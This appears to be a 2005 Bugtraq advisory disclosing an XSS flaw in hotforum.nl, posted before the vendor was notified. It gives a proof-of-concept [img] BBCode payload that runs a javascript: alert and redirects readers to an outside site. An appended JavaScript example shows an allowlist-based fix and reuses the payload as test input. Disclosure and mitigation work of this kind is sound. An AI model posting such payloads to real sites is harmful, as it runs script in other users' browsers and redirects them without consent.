Date: 12 Mar 2005 23:59:16 -0000
From: Rebyte Security <rebyte@...la.com>
To: bugtraq@...urityfocus.com
Subject: ...::: hotforum.nl XSS exploit :::...






               hotforum.nl XSS exploit
             ---------------------------
              * 13 March 2005
              * Discovered by Qon^Rebyte


..:: STATUS ::..
______________________________________________________________________

hotforum.nl has not yet been notified about this exploit


..:: VULNERABLE ::..
______________________________________________________________________

All hotforums, because it's an online service.
Once the service is patched all hotforums will be immune.


..:: EXPLOIT ::..
______________________________________________________________________

Risk: Low/Medium
Type: Input Validation Error
What: Input JS code

Proof of Concept
----------------

Post this:

**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img]
**********************************************************************

This will alert the following message:
"hotforum.nl xss exploit - by Qon^Rebyte"

and redirect to another site:
"http://dhost.info/recall/rebyte/"


..:: CREDITS ::..
______________________________________________________________________

This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)

 Greetings fly out 2
---------------------
    * Rebyte Security  : because it rox :)
    * Mr.Manson        : Rebyte co-admin
    * Bugtraq          : for doing a great job


         *** Qon ^ Rebyte ***


-- http://dhost.info/recall/rebyte/ --
---------- rebyte@...la.com ----------
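
A server-side mitigation for the [img] injection described in the advisory above, as an added example that is not part of the original post and is not hotforum.nl's code: the renderer turns [img] tags into <img> elements only for absolute http/https URLs and HTML-escapes everything else. The function names (renderPost, safeImageUrl, escapeHtml) are assumptions made for illustration.

```javascript
// Added example: allowlist-based rendering of [img] BBCode (hypothetical names).
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Escape text for use in an HTML body or a double-quoted attribute value.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Return the normalized absolute URL if its scheme is http(s), otherwise null.
function safeImageUrl(raw) {
  let url;
  try {
    // The WHATWG parser trims surrounding whitespace and lowercases the scheme,
    // so the check below sees the scheme the way a browser would.
    url = new URL(raw);
  } catch {
    return null; // relative or malformed input is rejected
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Render a forum post: everything is escaped, only vetted [img] tags become HTML.
function renderPost(input) {
  const tag = /\[img\]([\s\S]*?)\[\/img\]/gi; // [\s\S] so multi-line bodies match
  let out = "";
  let last = 0;
  for (const m of input.matchAll(tag)) {
    out += escapeHtml(input.slice(last, m.index));
    const href = safeImageUrl(m[1]);
    out += href
      ? `<img src="${escapeHtml(href)}" alt="">`
      : escapeHtml(m[0]); // rejected tag stays visible as inert text
    last = m.index + m[0].length;
  }
  return out + escapeHtml(input.slice(last));
}

// The post from the advisory, used as test input.
const POC = "[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');\n" +
  "location.replace('http://dhost.info/recall/rebyte/');[/img]";
console.log(renderPost(POC));
console.log(renderPost("[img]http://example.com/a.png[/img]")); // constructed input
```

Checking the parsed scheme against an allowlist, instead of searching the raw string for "javascript:", also rejects mixed-case spellings and other schemes such as data:.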

